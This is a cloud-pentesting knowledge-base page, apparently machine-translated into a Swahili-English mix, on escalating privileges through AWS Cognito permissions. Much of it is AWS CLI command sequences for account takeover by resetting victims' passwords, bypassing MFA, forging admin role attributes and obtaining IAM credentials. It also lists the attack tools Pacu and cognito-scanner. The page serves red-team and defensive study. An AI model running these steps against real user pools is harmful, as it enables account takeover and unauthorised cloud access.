AWS - Cognito Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Cognito

Kwa maelezo zaidi kuhusu Cognito angalia:

AWS - Cognito Enum

Kukusanya credentials kutoka kwa Identity Pool

Kwa kuwa Cognito inaweza kuipa IAM role credentials kwa authenticated na unauthenticated users, ikiwa utapata Identity Pool ID ya programu (inapaswa kuwa hardcoded ndani yake) unaweza kupata credentials mpya na hivyo privesc (ndani ya account ya AWS ambapo huenda haukuwa na credential yoyote hapo awali).

Kwa taarifa zaidi check this page.

Potential Impact: privesc ya moja kwa moja kwa services role iliyounganishwa na unauth users (na pengine kwa ile iliyounganishwa na auth users).

cognito-identity:SetIdentityPoolRoles, iam:PassRole

Kwa ruhusa hii unaweza grant any cognito role kwa authenticated/unauthenticated users wa cognito app.

aws cognito-identity set-identity-pool-roles \
--identity-pool-id <identity_pool_id> \
--roles unauthenticated=<role ARN>

# Get credentials
## Get one ID
aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
## Get creds for that id
aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"

If the cognito app haijawezesha watumiaji wasiotambulishwa unaweza pia kuhitaji ruhusa cognito-identity:UpdateIdentityPool ili kuziwezesha.

Athari Inayowezekana: Direct privesc kwa role yoyote ya cognito.

cognito-identity:update-identity-pool

Mshambuliaji aliye na ruhusa hii anaweza, kwa mfano, kuweka Cognito User Pool chini ya udhibiti wake au mtoa huduma nyingine wa utambulisho ambapo anaweza kuingia kama njia ya kufikia hii Cognito Identity Pool. Kisha, kwa kuingia tu kwenye mtoa huduma huyo wa watumiaji, itamruhusu kufikia role iliyosanidiwa iliyothibitishwa katika Identity Pool.

# This example is using a Cognito User Pool as identity provider
## but you could use any other identity provider
aws cognito-identity update-identity-pool \
--identity-pool-id <value> \
--identity-pool-name <value> \
[--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \
--cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false

# Now you need to login to the User Pool you have configured
## after having the id token of the login continue with the following commands:

# In this step you should have already an ID Token
aws cognito-identity get-id \
--identity-pool-id <id_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Get the identity_id from thr previous commnad response
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

Inawezekana pia kutumia vibaya ruhusa hii kuruhusu basic auth:

aws cognito-identity update-identity-pool \
--identity-pool-id <value> \
--identity-pool-name <value> \
--allow-unauthenticated-identities
--allow-classic-flow

Athari Inayoweza Kutokea: Kupata udhibiti wa role ya IAM iliyosanidiwa kwa watumiaji waliothibitishwa ndani ya identity pool.

cognito-idp:AdminAddUserToGroup

Ruhusa hii inaruhusu kuongeza mtumiaji wa Cognito kwenye kikundi cha Cognito, kwa hivyo mshambuliaji anaweza kutumia vibaya ruhusa hii kuongeza mtumiaji aliye chini ya udhibiti wake kwenye makundi mengine yenye vibali vya bora au IAM roles tofauti:

aws cognito-idp admin-add-user-to-group \
--user-pool-id <value> \
--username <value> \
--group-name <value>

Athari Inayoweza Kutokea: Privesc kwa vikundi vingine vya Cognito na IAM roles zilizoambatishwa kwenye User Pool Groups.

(cognito-idp:CreateGroup | cognito-idp:UpdateGroup), iam:PassRole

Mshambuliaji aliye na ruhusa hizi anaweza kuunda/kusasisha vikundi na kila IAM role inayoweza kutumika na Cognito Identity Provider iliyoharibika na kumfanya mtumiaji aliyeharibika kuwa sehemu ya kikundi, akipata ufikiaji wa IAM roles zote hizo:

aws cognito-idp create-group --group-name Hacked --user-pool-id <user-pool-id> --role-arn <role-arn>

Athari zinazowezekana: Privesc kwa Cognito IAM roles nyingine.

cognito-idp:AdminConfirmSignUp

Ruhusa hii inaruhusu kuthibitisha usajili. Kwa chaguo-msingi, mtu yeyote anaweza kujiandikisha kwenye applications za Cognito; ikiwa itaachwa hivyo, mtumiaji anaweza kuunda akaunti kwa data yoyote na kuihakiki kwa ruhusa hii.

aws cognito-idp admin-confirm-sign-up \
--user-pool-id <value> \
--username <value>

Athari Inayoweza Kutokea: Indirect privesc kwa identity pool IAM role kwa authenticated users ikiwa unaweza register a new user. Indirect privesc kwa functionalities nyingine za app kwa uwezo wa confirm any account.

cognito-idp:AdminCreateUser

Ruhusa hii itampa mshambuliaji uwezo wa ku-create a new user ndani ya user pool. User mpya huundwa akiwa enabled, lakini atahitaji kubadili nywila yake.

aws cognito-idp admin-create-user \
--user-pool-id <value> \
--username <value> \
[--user-attributes <value>] ([Name=email,Value=email@gmail.com])
[--validation-data <value>]
[--temporary-password <value>]

Athari Inayowezekana: Direct privesc kwa identity pool IAM role kwa watumiaji walioidhinishwa. Indirect privesc kwa vipengele vingine vya app vinavyoweza kuunda mtumiaji yeyote

cognito-idp:AdminEnableUser

Ruhusa hizi zinaweza kusaidia katika tukio la nadra kabisa ambapo mshambuliaji amepata credentials za mtumiaji aliyefungwa na anahitaji kuiwezesha tena.

aws cognito-idp admin-enable-user \
--user-pool-id <value> \
--username <value>

Athari Inayoweza Kutokea: Indirect privesc kwa identity pool IAM role kwa authenticated users na idhini za mtumiaji ikiwa mshambuliaji angekuwa na credentials za mtumiaji aliyezimwa.

cognito-idp:AdminInitiateAuth, cognito-idp:AdminRespondToAuthChallenge

Ruhusa hii inaruhusu kuingia kwa kutumia method ADMIN_USER_PASSWORD_AUTH. Kwa taarifa zaidi fuata kiungo.

cognito-idp:AdminSetUserPassword

Ruhusa hii ingemruhusu mshambuliaji kuweka nywila inayojulikana kwa mtumiaji yeyote, mara nyingi zikisababisha kunyakuliwa kwa akaunti moja kwa moja (hasa ikiwa mwathiriwa hana MFA imewezeshwa, au MFA haitekelezajiwa kwa mtiririko wa uthibitisho/mteja husika).

aws cognito-idp admin-set-user-password \
--user-pool-id <value> \
--username <value> \
--password <value> \
--permanent

Mtiririko wa kawaida:

REGION="us-east-1"
USER_POOL_ID="<user_pool_id>"
VICTIM_USERNAME="<victim_username_or_email>"
NEW_PASS='P@ssw0rd-ChangeMe-123!'

# 1) Set a permanent password for the victim (takeover primitive)
aws cognito-idp admin-set-user-password \
--region "$REGION" \
--user-pool-id "$USER_POOL_ID" \
--username "$VICTIM_USERNAME" \
--password "$NEW_PASS" \
--permanent

# 2) Login as the victim against a User Pool App Client (doesn't require AWS creds)
CLIENT_ID="<user_pool_app_client_id>"
aws cognito-idp initiate-auth \
--no-sign-request --region "$REGION" \
--client-id "$CLIENT_ID" \
--auth-flow USER_PASSWORD_AUTH \
--auth-parameters "USERNAME=$VICTIM_USERNAME,PASSWORD=$NEW_PASS"

Ruhusa inayohusiana: cognito-idp:AdminResetUserPassword inaweza kutumika kulazimisha mtiririko wa kuweka upya nywila kwa mwathiriwa (athari inategemea jinsi urejeshaji wa nywila ulivyo tekelezwa na kile muvamizi anaweza kukamata au kudhibiti).

Athari Inayowezekana: Kunyakuliwa kwa akaunti za watumiaji yoyote; upatikanaji wa vibali vya app-layer (groups/roles/claims) na chochote kinachotegemea tokeni za Cognito; uwezekano wa kupata Identity Pool authenticated IAM roles.

cognito-idp:AdminSetUserSettings | cognito-idp:SetUserMFAPreference | cognito-idp:SetUserPoolMfaConfig | cognito-idp:UpdateUserPool

AdminSetUserSettings: Muvamizi anaweza kutumia vibaya ruhusa hii kuweka namba ya simu anayedhibiti kama SMS MFA ya mtumiaji.

aws cognito-idp admin-set-user-settings \
--user-pool-id <value> \
--username <value> \
--mfa-options <value>

SetUserMFAPreference: Kama ile ya hapo awali, ruhusa hii inaweza kutumiwa kuweka mapendeleo ya MFA ya mtumiaji ili bypass ulinzi wa MFA.

aws cognito-idp admin-set-user-mfa-preference \
[--sms-mfa-settings <value>] \
[--software-token-mfa-settings <value>] \
--username <value> \
--user-pool-id <value>

SetUserPoolMfaConfig: Kama ile ya awali, ruhusa hii inaweza kutumika kuweka mapendeleo ya MFA ya pool ya watumiaji ili kuvuka ulinzi wa MFA.

aws cognito-idp set-user-pool-mfa-config \
--user-pool-id <value> \
[--sms-mfa-configuration <value>] \
[--software-token-mfa-configuration <value>] \
[--mfa-configuration <value>]

UpdateUserPool: Pia inawezekana kusasisha user pool ili kubadilisha sera ya MFA. Check cli here.

Potential Impact: Privesc isiyo ya moja kwa moja kwa mtumiaji yeyote ambaye mshambuliaji anajua kredenshiali zake; hili linaweza kuruhusu kupitisha ulinzi wa MFA.

cognito-idp:AdminUpdateUserAttributes

Mshambuliaji mwenye ruhusa hii anaweza kubadilisha sifa yoyote inayoweza kubadilishwa ya mtumiaji wa User Pool (ikijumuisha sifa za custom:*) ili kujaribu kupata vibali katika programu inayofanya kazi chini yake.

Mfumo wa kawaida mwenye athari kubwa ni claim-based RBAC uliotekelezwa kwa kutumia custom attributes (kwa mfano custom:role=admin). Ikiwa programu inamwamini dai hilo, kuibadilisha na kisha kuthibitisha utambulisho tena kunaweza kupitisha idhinishaji bila kugusa programu.

aws cognito-idp admin-update-user-attributes \
--user-pool-id <value> \
--username <value> \
--user-attributes <value>

Mfano: boresha role yako mwenyewe na refresh tokens:

REGION="us-east-1"
USER_POOL_ID="<user_pool_id>"
USERNAME="<your_username>"

# 1) Change the RBAC attribute (example)
aws cognito-idp admin-update-user-attributes \
--region "$REGION" \
--user-pool-id "$USER_POOL_ID" \
--username "$USERNAME" \
--user-attributes Name="custom:role",Value="admin"

# 2) Re-authenticate to obtain a token with updated claims
CLIENT_ID="<user_pool_app_client_id>"
PASSWORD="<your_password>"
aws cognito-idp initiate-auth \
--no-sign-request --region "$REGION" \
--client-id "$CLIENT_ID" \
--auth-flow USER_PASSWORD_AUTH \
--auth-parameters "USERNAME=$USERNAME,PASSWORD=$PASSWORD"

Potential Impact: Indirect privesc katika programu zinazomwamini Cognito attributes/claims kwa ajili ya idhinishaji; uwezo wa kubadilisha attributes nyingine zinazohusiana na usalama (kwa mfano kuweka email_verified au phone_number_verified kuwa true kunaweza kuwa muhimu katika baadhi ya apps).

cognito-idp:CreateUserPoolClient | cognito-idp:UpdateUserPoolClient

Mshambulizi mwenye ruhusa hii anaweza kuunda User Pool Client mpya isiyozuiliwa sana ikilinganishwa na pool clients zilizopo. Kwa mfano, client mpya inaweza kuruhusu aina yoyote ya njia za authenticate, isiwe na secret, token revocation iwe disabled, au kuruhusu tokens kuwa halali kwa kipindi kirefu…

Hali hiyo inaweza kutokea pia ikiwa badala ya kuunda client mpya, ile iliyopo imebadilishwa.

Kwenye command line (au the update one) unaweza kuona chaguzi zote, angalia!

aws cognito-idp create-user-pool-client \
--user-pool-id <value> \
--client-name <value> \
[...]

Athari Inayoweza Kutokea: Privesc isiyo ya moja kwa moja kwa mtumiaji aliyeidhinishwa wa Identity Pool unaotumika na User Pool kwa kuunda client mpya inayopunguza hatua za usalama na kumwezesha mshambuliaji kuingia na mtumiaji aliyemuumba.

cognito-idp:CreateUserImportJob | cognito-idp:StartUserImportJob

Mshambuliaji anaweza kutumia vibaya ruhusa hii kuunda watumiaji kwa kupakia csv yenye watumiaji wapya.

# Create a new import job
aws cognito-idp create-user-import-job \
--job-name <value> \
--user-pool-id <value> \
--cloud-watch-logs-role-arn <value>

# Use a new import job
aws cognito-idp start-user-import-job \
--user-pool-id <value> \
--job-id <value>

# Both options before will give you a URL where you can send the CVS file with the users to create
curl -v -T "PATH_TO_CSV_FILE" \
-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"

(Katika kesi ambapo unaunda import job mpya unaweza pia kuhitaji ruhusa ya iam passrole; sijajaribu bado).

Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa identity pool IAM role kwa watumiaji walioidhinishwa. Privesc isiyo ya moja kwa moja kwa functionalities nyingine za app zinazoweza kuunda mtumiaji yeyote.

cognito-idp:CreateIdentityProvider | cognito-idp:UpdateIdentityProvider

An attacker anaweza kuunda identity provider mpya kisha kuwa na uwezo wa login through this provider.

aws cognito-idp create-identity-provider \
--user-pool-id <value> \
--provider-name <value> \
--provider-type <value> \
--provider-details <value> \
[--attribute-mapping <value>] \
[--idp-identifiers <value>]

Athari Inayoweza Kutokea: Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.

cognito-sync:* Uchambuzi

Hii ni permission inayotumika sana kwa default katika roles za Cognito Identity Pools. Hata kama wildcard katika permissions inaonekana mbaya (hasa ikitoka kwa AWS), permissions zilizotolewa hazitumiwi sana kutoka mtazamo wa attacker.

Permission hii inaruhusu kusoma taarifa za matumizi za Identity Pools na Identity IDs ndani ya Identity Pools (ambazo sio taarifa nyeti).
Identity IDs inaweza kuwa na Datasets zilizogawiwa kwao, ambazo ni taarifa za vikao (AWS inaielezea kama mchezo uliohifadhiwa). Inawezekana kwamba hizi zinaweza kuwa na aina fulani ya taarifa nyeti (lakini uwezekano ni mdogo sana). Unaweza kupata kwenye enumeration page jinsi ya kufikia taarifa hizi.

Mshambuliaji anaweza pia kutumia permissions hizi kuenroll himself to a Cognito stream that publish changes kwenye datasets hizi au kulambda that triggers on cognito events. Sijawahi kuona hii ikitumika, na sitegemei taarifa nyeti hapa, lakini siyo hauwezekani kabisa.

Zana za Kiotomatiki

  • Pacu, the AWS exploitation framework, sasa inajumuisha modules “cognito__enum” na “cognito__attack” ambazo zinafanya otomatiki enumeration ya mali zote za Cognito katika account na kuashiria configurations dhaifu, user attributes zinazotumika kwa access control, n.k., na pia zinafanya otomatiki uundaji wa watumiaji (including MFA support) na privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.

Kwa maelezo ya kazi za modules angalia sehemu ya 2 ya the blog post. Kwa maagizo ya ufungaji angalia ukurasa mkuu wa Pacu.

Matumizi

Mfano wa matumizi ya cognito__attack kujaribu uundaji wa mtumiaji na vigezo vyote vya privesc dhidi ya identity pool na user pool client iliyotolewa:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Mfano wa matumizi ya cognito__enum kukusanya user pools, user pool clients, identity pools, users, n.k. zinazoonekana katika akaunti ya sasa ya AWS:

Pacu (new:test) > run cognito__enum
  • Cognito Scanner ni CLI tool katika python inayotekeleza attacks mbalimbali kwenye Cognito ikijumuisha privesc escalation.

Installation

$ pip install cognito-scanner

Matumizi

$ cognito-scanner --help

Kwa maelezo zaidi angalia https://github.com/padok-team/cognito-scanner

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks